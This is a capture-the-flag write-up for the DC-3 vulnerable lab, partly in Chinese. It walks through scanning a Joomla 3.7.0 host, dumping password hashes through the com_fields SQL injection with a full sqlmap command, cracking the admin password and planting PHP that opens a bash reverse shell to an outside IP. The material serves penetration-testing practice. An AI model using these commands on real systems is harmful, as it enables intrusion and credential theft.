DC: 3.2

Description
DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
For those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).
If that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.

Write-UP

hausa@debian:~$ fping -asg 172.16.1.1/24
172.16.1.1
172.16.1.133

hausa@debian:~$ nmap -A -p 1-65535 172.16.1.133
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-01 07:41 EDT
Nmap scan report for bogon (172.16.1.133)
Host is up (0.00015s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator:
Joomla! – Open Source Content Management
|_http-server-header:
Apache/2.4.18 (Ubuntu)
|_http-title: Home
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds

Veiw port 80:

hausa@debian:~$ joomscan -u 172.16.1.133
[+] Detecting Joomla Version
[++] Joomla 3.7.0

hausa@debian:~$ searchsploit joomla 3.7.0
Joomla! 3.7.0 – ‘com_fields’ SQL Injection | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 – Cross-Site Scripting | php/webapps/43488.txt

View 42033.txt

hausa@debian:~$ sqlmap -u "http://172.16.1.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C password --dump -p list[fullordering]
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

hausa@debian:~$ sudo john temp.txt
snoopy (?)

Login with admin:snoopy and write eval code to a php file
system('bash -i >& /dev/tcp/192.168.43.173/8888 0>&1');
但是不知道为什么一直弹不了shell,只能在浏览器上整了
?hausa=bash -c 'whoami;ls'假装自己有了个shell
lsb release -a
然后用已有的exp提权即可。

总结
~弹不来shell,原因未知。。。
~searchsploit的使用